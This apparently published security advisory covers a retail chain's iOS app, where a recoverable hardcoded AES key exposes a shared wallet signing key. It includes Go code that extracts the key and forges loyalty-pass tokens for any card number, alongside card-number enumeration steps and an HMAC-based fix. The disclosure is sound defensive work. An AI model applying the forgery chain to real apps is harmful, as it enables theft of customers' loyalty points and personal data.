
Hardcoded AES Key in iOS App Enables Loyalty Card Forgery Across 8 Countries

Reported Mar 21, 2026
Severity Critical
Platform iOS
Vulnerability Class Hardcoded Cryptographic Key (CWE-321)
Target Type Retail / Beauty Chain
Impact Mass loyalty card forgery + points theft

The Risk

A retail chain's iPhone app contained a secret key that unlocked its entire loyalty card system. An attacker could create a fake digital loyalty card for any customer, complete with their name, points balance, and a working barcode that scans at the register. Customer card numbers were sequential and easy to guess. The same vulnerability affected all 8 of the chain's country-specific apps, putting customers across Europe at risk of having their loyalty points stolen and spent.

The Vulnerability

The iOS app bundled an encrypted configuration file containing API secrets. The decryption key was a UUID stored as a Swift lazy global variable and recoverable through runtime instrumentation; its first 16 bytes served as the AES-128 key, used with an all-zero IV.

Decrypting the config file revealed 10 secrets, including OAuth credentials, analytics API keys, and the digital wallet signing key.

The Attack

The digital wallet provider used a single symmetric key, shared between the app and the provider, to generate provisioning tokens. Whoever holds that key can mint a token for any card number, and the zero IV means the same card number always yields the same token. The flow:

  1. Take a customer's card number
  2. Encrypt it with AES-256-CBC using the extracted signing key (zero IV)
  3. Base64-encode the ciphertext
  4. Construct a provisioning URL with the token
  5. Open the URL on any iPhone

The victim's loyalty card is provisioned into the attacker's Apple Wallet, complete with full name, points balance, loyalty tier, and a scannable barcode. The barcode works at any store location.
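The chain described above, from decrypting the bundled config with the UUID-derived key (The Vulnerability section) through steps 1 to 4 of the attack, as an added example in Go. This is not the researcher's tooling or the provider's code. Every value in it is constructed: the UUID, the 32-byte wallet key, the JSON layout of the config file and the wallet.example URL are stand-ins, and taking the key from the UUID's string form is an interpretation of the report. The sample config is encrypted inside the block so it runs offline; `ProviderCardNumber` models the only check a shared-key design allows the provider to make.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/json"
	"errors"
	"net/url"
)

// Constructed sample values; none of them come from the real app or provider.
const sampleUUID = "0f3b9d2a-6c1e-4e8b-9a77-5d4c3b2a1f00"   // stands in for the UUID global
var sampleWalletKey = []byte("sample-wallet-signing-key-32byte") // 32 bytes, so AES-256
const provisionBase = "https://wallet.example/provision"   // hypothetical provider URL

func pkcs7Unpad(b []byte) ([]byte, error) {
	n := 0
	if len(b) > 0 {
		n = int(b[len(b)-1])
	}
	if n == 0 || n > aes.BlockSize || n > len(b) || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// AES-CBC with an all-zero IV, as the report describes for both the config file (16-byte
// key, AES-128) and the token (32-byte key, AES-256). A fixed IV makes it deterministic.
func cbcZeroIVEncrypt(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	n := aes.BlockSize - len(plaintext)%aes.BlockSize // PKCS#7 padding
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(n)}, n)...)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(out, padded)
	return out, nil
}

func cbcZeroIVDecrypt(key, ciphertext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(ciphertext) == 0 || len(ciphertext)%aes.BlockSize != 0 {
		return nil, errors.New("bad key or ciphertext length")
	}
	out := make([]byte, len(ciphertext))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(out, ciphertext)
	return pkcs7Unpad(out)
}

// ConfigKey: the first 16 bytes of the UUID (its string form here; the report does not say).
func ConfigKey(uuid string) []byte { return []byte(uuid)[:16] }

// BuildSampleConfig stands in for the encrypted config file bundled with the app.
func BuildSampleConfig() ([]byte, error) {
	plain, _ := json.Marshal(map[string]string{
		"wallet_signing_key": base64.StdEncoding.EncodeToString(sampleWalletKey),
	})
	return cbcZeroIVEncrypt(ConfigKey(sampleUUID), plain)
}

// ExtractWalletKey is the attacker's side: decrypt the bundle with the recovered UUID
// and read out the wallet signing key.
func ExtractWalletKey(encConfig []byte, uuid string) ([]byte, error) {
	plain, err := cbcZeroIVDecrypt(ConfigKey(uuid), encConfig)
	if err != nil {
		return nil, err
	}
	var cfg map[string]string
	if err := json.Unmarshal(plain, &cfg); err != nil {
		return nil, err
	}
	return base64.StdEncoding.DecodeString(cfg["wallet_signing_key"])
}

// ForgeToken is steps 2 and 3 of the attack: AES-256-CBC, zero IV, base64. Any card number works.
func ForgeToken(walletKey []byte, cardNumber string) (string, error) {
	ct, err := cbcZeroIVEncrypt(walletKey, []byte(cardNumber))
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(ct), nil
}

// ProvisioningURL is step 4: the URL that, opened on any iPhone, adds the pass.
func ProvisioningURL(token string) string { return provisionBase + "?token=" + url.QueryEscape(token) }

// ProviderCardNumber models all a shared-key provider can check: that the token decrypts
// under the key. Nothing ties it to who opened the URL, so the check passes for a forgery.
func ProviderCardNumber(walletKey []byte, token string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(token)
	if err != nil {
		return "", err
	}
	plain, err := cbcZeroIVDecrypt(walletKey, ct)
	return string(plain), err
}
```

The two things worth noticing when running it: the extracted key equals the provider's key exactly (there is no per-user or per-device material anywhere in the scheme), and forging the same card number twice gives byte-identical tokens, which is what a zero IV buys the attacker: tokens can be precomputed for every sequential card number without ever touching the provider.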

Card Number Enumeration

The same decrypted config contained OAuth credentials that enabled guest token generation. An unauthenticated endpoint accepted card numbers and returned whether they were valid, along with the customer's VIP status flag. Card numbers were sequential, with 41 out of 41 tested numbers valid in the sampled range. No rate limiting was observed.

This turns a targeted attack into a mass exploitation scenario. An attacker could enumerate all valid card numbers, forge Apple Wallet passes for each, and extract or spend loyalty points at scale.

Cross-Country Scope

The encryption key and schema were identical across all 8 country variants of the app (Austria, Italy, France, Switzerland, Czech Republic, Romania, Hungary, Slovakia). The OAuth secret ciphertext was also identical between the iOS and Android builds, confirming the same key is used cross-platform.

The Impact

  • Forge Apple Wallet loyalty passes for any customer
  • Extract full name, loyalty tier, and points balance
  • Spend loyalty points at any physical store via the working barcode (150 points = 7.50 EUR voucher)
  • Enumerate all valid card numbers via unauthenticated endpoint
  • Affects 8 countries and both iOS and Android platforms
  • Zero authentication required, zero victim interaction

Remediation

  • Rotate the digital wallet signing keys for all 8 countries and both platforms
  • Remove the encryption key and the secrets it protects from the compiled binary. Anything the client can decrypt, an attacker holding the app can decrypt too, so the wallet signing key must never reach the device at all; secrets the app genuinely needs should be fetched at runtime from a hardened backend after authentication
  • Add server-side authentication to the digital wallet provisioning flow
  • Rate-limit and authenticate the card validation endpoint
  • Rotate OAuth credentials
  • Use per-user signed tokens, bound to the authenticated account and carrying an expiry, instead of a shared symmetric key
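What the last two remediation items look like in code, as an added example in Go; this is neither the chain's nor the wallet provider's implementation. The token is an HMAC-SHA256 over claims that name the authenticated user, the card the server looked up for that user, an expiry and a random nonce, signed with a secret that exists only on the backend. The secret value, the claim names and the user and card identifiers are all constructed for the example.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"strings"
	"time"
)

// Hypothetical server-only secret. It lives in the backend's secret store and never
// ships in the app; the real one would come from crypto/rand, not a string literal.
var serverSecret = []byte("constructed-server-secret-never-in-the-app")

// provisionClaims binds the pass to the account that requested it, with a deadline.
type provisionClaims struct {
	UserID string `json:"uid"`   // authenticated account the token was issued to
	Card   string `json:"card"`  // the card the server looked up for that account
	Exp    int64  `json:"exp"`   // unix seconds after which the token is dead
	Nonce  string `json:"nonce"` // random, so two requests never yield the same token
}

func b64(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

func sign(secret, body []byte) []byte {
	mac := hmac.New(sha256.New, secret)
	mac.Write(body)
	return mac.Sum(nil)
}

// IssueToken runs on the backend after login. The client never supplies a card
// number; the server resolves it from the session and signs the result.
func IssueToken(secret []byte, userID, card string, ttl time.Duration, now time.Time) (string, error) {
	nonce := make([]byte, 16)
	if _, err := rand.Read(nonce); err != nil {
		return "", err
	}
	body, err := json.Marshal(provisionClaims{UserID: userID, Card: card, Exp: now.Add(ttl).Unix(), Nonce: b64(nonce)})
	if err != nil {
		return "", err
	}
	return b64(body) + "." + b64(sign(secret, body)), nil
}

// VerifyToken runs at the provisioning endpoint, which now requires a login too.
// callerID is the authenticated user presenting the token; a token minted for
// someone else, expired, or edited after signing is refused.
func VerifyToken(secret []byte, token, callerID string, now time.Time) (string, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 2 {
		return "", errors.New("malformed token")
	}
	body, err := base64.RawURLEncoding.DecodeString(parts[0])
	if err != nil {
		return "", err
	}
	sig, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return "", err
	}
	if !hmac.Equal(sig, sign(secret, body)) { // constant-time compare
		return "", errors.New("bad signature")
	}
	var c provisionClaims
	if err := json.Unmarshal(body, &c); err != nil {
		return "", err
	}
	if now.Unix() >= c.Exp {
		return "", errors.New("token expired")
	}
	if c.UserID != callerID {
		return "", errors.New("token was issued to a different user")
	}
	return c.Card, nil
}

// TamperCard is what the attacker from the report would try next: keep the signature
// and swap in another card number. The HMAC check above catches it.
func TamperCard(token, newCard string) string {
	parts := strings.SplitN(token, ".", 2)
	if len(parts) != 2 {
		return token
	}
	body, _ := base64.RawURLEncoding.DecodeString(parts[0])
	var c provisionClaims
	_ = json.Unmarshal(body, &c)
	c.Card = newCard
	edited, _ := json.Marshal(c)
	return b64(edited) + "." + parts[1]
}
```

Compared with the shared-key scheme in the report, an attacker who extracts every secret from the app still cannot mint a token, because the signing secret is not in the app; a stolen token only provisions the pass for the account it was issued to, and only until it expires. Recording used nonces server-side would additionally make each token single-use, which this example leaves out.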